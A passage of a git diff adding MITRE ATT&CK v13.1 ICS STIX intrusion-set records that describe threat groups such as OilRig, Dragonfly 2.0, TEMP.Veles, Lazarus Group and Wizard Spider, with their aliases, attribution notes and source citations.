"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json new file mode 100644 index 0000000000000000000000000000000000000000..4e3f6e81cfcc11bf75e848403f3248c916678acc --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d.json 
@@ -0,0 +1,127 @@ +{ + "type": "bundle", + "id": "bundle--e6a6e0b9-6b67-4ccc-8556-517018ace9e8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-06T20:58:52.317Z", + "name": "OilRig", + "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)", + "aliases": [ + "OilRig", + "COBALT GYPSY", + "IRN2", + "APT34", + "Helix Kitten", + "Evasive Serpens" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Robert Falcone", + "Bryan Lee", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0049", + "external_id": "G0049" + }, + { + "source_name": "IRN2", + "description": "(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "OilRig", + "description": "(Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) 
(Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: Unit 42 QUADAGENT July 2018)" + }, + { + "source_name": "COBALT GYPSY", + "description": "(Citation: Secureworks COBALT GYPSY Threat Profile)" + }, + { + "source_name": "Helix Kitten", + "description": "(Citation: Unit 42 QUADAGENT July 2018)(Citation: Crowdstrike Helix Kitten Nov 2018)" + }, + { + "source_name": "Evasive Serpens", + "description": "(Citation: Unit42 OilRig Playbook 2023)" + }, + { + "source_name": "Check Point APT34 April 2021", + "description": "Check Point. (2021, April 8). Iran\u2019s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.", + "url": "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/" + }, + { + "source_name": "ClearSky OilRig Jan 2017", + "description": "ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.", + "url": "http://www.clearskysec.com/oilrig/" + }, + { + "source_name": "Palo Alto OilRig May 2016", + "description": "Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/" + }, + { + "source_name": "Palo Alto OilRig April 2017", + "description": "Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/" + }, + { + "source_name": "Palo Alto OilRig Oct 2016", + "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. 
Retrieved May 3, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" + }, + { + "source_name": "Unit 42 QUADAGENT July 2018", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/" + }, + { + "source_name": "Crowdstrike Helix Kitten Nov 2018", + "description": "Meyers, A. (2018, November 27). Meet CrowdStrike\u2019s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/" + }, + { + "source_name": "FireEye APT34 Dec 2017", + "description": "Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html" + }, + { + "source_name": "Secureworks COBALT GYPSY Threat Profile", + "description": "Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy" + }, + { + "source_name": "APT34", + "description": "This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.(Citation: Unit 42 QUADAGENT July 2018)(Citation: FireEye APT34 Dec 2017)(Citation: Check Point APT34 April 2021)" + }, + { + "source_name": "Unit 42 Playbook Dec 2017", + "description": "Unit 42. (2017, December 15). Unit 42 Playbook Viewer. 
Retrieved December 20, 2017.", + "url": "https://pan-unit42.github.io/playbook_viewer/" + }, + { + "source_name": "Unit42 OilRig Playbook 2023", + "description": "Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.", + "url": "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json new file mode 100644 index 0000000000000000000000000000000000000000..41c68211922e7f0519807bca615093055416922f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--97f420fa-f87c-4de4-a263-e0cb30d14702", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "ics-attack" + ], + "id": "intrusion-set--68ba94ab-78b8-43e7-83e2-aed3466882c6", + "type": "intrusion-set", + "created": "2018-01-16T16:13:52.465Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0057", + "external_id": "G0057" + } + ], + "modified": "2018-10-17T00:17:13.469Z", + "name": "APT34", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json new file mode 100644 index 0000000000000000000000000000000000000000..db8bc0a0338ad718e356079f8d452e7dc10b27d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71.json 
@@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--21b8d210-516c-4cf9-a725-8c65bb30f9af", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "Dragonfly 2.0", + "IRON LIBERTY", + "DYMALLOY", + "Berserk Bear" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--76d59913-1d24-4992-a8ac-05a3eb093f71", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G0074", + "url": "https://attack.mitre.org/groups/G0074" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks MCMD July 2019)(Citation: Secureworks IRON LIBERTY)" + }, + { + "source_name": "Dragonfly 2.0", + "description": "(Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) (Citation: Fortune Dragonfly 2.0 Sept 2017)" + }, + { + "source_name": "Dragos DYMALLOY ", + "url": "https://www.dragos.com/threat/dymalloy/", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020." + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018." + }, + { + "source_name": "Secureworks MCMD July 2019", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020." 
+ }, + { + "source_name": "Secureworks IRON LIBERTY", + "url": "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "description": "Secureworks. (n.d.). IRON LIBERTY. Retrieved October 15, 2020." + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "url": "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "description": "Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017." + }, + { + "source_name": "US-CERT TA18-074A", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "description": "US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY )", + "modified": "2022-05-11T14:00:00.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Dragonfly 2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json new file mode 100644 index 0000000000000000000000000000000000000000..1b2d73bd95f0b60be4d63a774f9f5943fdf4e503 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--a0a9261a-9256-47ce-8646-330f765b3baa", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-30T22:46:40.135Z", + "name": "TEMP.Veles", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing [TRITON](https://attack.mitre.org/software/S0609), a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "aliases": [ + "TEMP.Veles", + "XENOTIME" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "created": "2019-04-16T15:14:38.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0088", + "external_id": "G0088" + }, + { + "source_name": "TEMP.Veles", + "description": "(Citation: FireEye TRITON 2019)" + }, + { + "source_name": "Dragos Xenotime 2018", + "description": "Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.", + "url": "https://dragos.com/resource/xenotime/" + }, + { + "source_name": "FireEye TEMP.Veles 2018", + "description": "FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html" + }, + { + "source_name": "FireEye TRITON 2019", + "description": "Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. 
Retrieved April 16, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html" + }, + { + "source_name": "FireEye TEMP.Veles JSON April 2019", + "description": "Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html" + }, + { + "source_name": "Pylos Xenotime 2019", + "description": "Slowik, J.. (2019, April 12). A XENOTIME to Remember: Veles in the Wild. Retrieved April 16, 2019.", + "url": "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + }, + { + "source_name": "XENOTIME", + "description": "The activity group XENOTIME, as defined by Dragos, has overlaps with activity reported upon by FireEye about TEMP.Veles as well as the actors behind [TRITON](https://attack.mitre.org/software/S0609).(Citation: Dragos Xenotime 2018)(Citation: Pylos Xenotime 2019)(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json new file mode 100644 index 0000000000000000000000000000000000000000..a2408e7aca2ace6201976cb96007b7c815377f7b --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--d7950267-aecb-4eaf-bbdd-7124d9224bea", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-28T20:49:53.223Z", + "name": "GOLD SOUTHFIELD", + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)", + "aliases": [ + "GOLD SOUTHFIELD", + "Pinchy Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Thijn Bukkems, Amazon" + ], + "type": "intrusion-set", + "id": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "created": "2020-09-22T19:41:27.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0115", + "external_id": "G0115" + }, + { + "source_name": "Pinchy Spider", + "description": "(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. 
Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "CrowdStrike Evolution of Pinchy Spider July 2021", + "description": "Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.", + "url": "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json new file mode 100644 index 0000000000000000000000000000000000000000..f5c24084c9bb508fe14ffeef77e83443e7de8bad --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a.json 
@@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--95f75d2e-8cbf-460b-a3a2-efbf99ef2f7e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T19:01:41.451Z", + "name": "Lazarus Group", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). 
", + "aliases": [ + "Lazarus Group", + "Labyrinth Chollima", + "HIDDEN COBRA", + "Guardians of Peace", + "ZINC", + "NICKEL ACADEMY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.2", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "created": "2017-05-31T21:32:03.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0032", + "external_id": "G0032" + }, + { + "source_name": "Labyrinth Chollima", + "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)" + }, + { + "source_name": "ZINC", + "description": "(Citation: Microsoft ZINC disruption Dec 2017)" + }, + { + "source_name": "Lazarus Group", + "description": "(Citation: Novetta Blockbuster)" + }, + { + "source_name": "NICKEL ACADEMY", + "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)" + }, + { + "source_name": "Guardians of Peace", + "description": "(Citation: US-CERT HIDDEN COBRA June 2017)" + }, + { + "source_name": "CrowdStrike Labyrinth Chollima Feb 2022", + "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.", + "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Secureworks NICKEL ACADEMY Dec 2017", + "description": "Secureworks. (2017, December 15). 
Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.", + "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" + }, + { + "source_name": "Microsoft ZINC disruption Dec 2017", + "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.", + "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" + }, + { + "source_name": "HIDDEN COBRA", + "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + }, + { + "source_name": "US-CERT HIDDEN COBRA June 2017", + "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA \u2013 North Korea\u2019s DDoS Botnet Infrastructure. Retrieved July 13, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A" + }, + { + "source_name": "US-CERT HOPLIGHT Apr 2019", + "description": "US-CERT. (2019, April 10). MAR-10135536-8 \u2013 North Korean Trojan: HOPLIGHT. 
Retrieved April 19, 2019.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json new file mode 100644 index 0000000000000000000000000000000000000000..97985709a41684613ad78f7f08e69193c2a84b06 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7.json 
@@ -0,0 +1,87 @@ +{ + "type": "bundle", + "id": "bundle--f8b9df8b-ef3a-4341-96e9-45929ffcb62c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:44:27.289Z", + "name": "Wizard Spider", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "aliases": [ + "Wizard Spider", + "UNC1878", + "TEMP.MixMaster", + "Grim Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Oleksiy Gayda" + ], + "type": "intrusion-set", + "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "created": "2020-05-12T18:15:29.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0102", + "external_id": "G0102" + }, + { + "source_name": "Grim Spider", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)" + }, + { + "source_name": "UNC1878", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)" + }, + { + "source_name": "TEMP.MixMaster", + "description": "(Citation: FireEye Ryuk and Trickbot January 2019)" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. 
Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "CrowdStrike Grim Spider May 2019", + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. 
Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json new file mode 100644 index 0000000000000000000000000000000000000000..a845e1aa4ca52a4ea7e4ac6bea482623a8d1bddf --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/intrusion-set/intrusion-set--f29b7c5e-2439-42ad-a86f-9f8984fafae3.json 
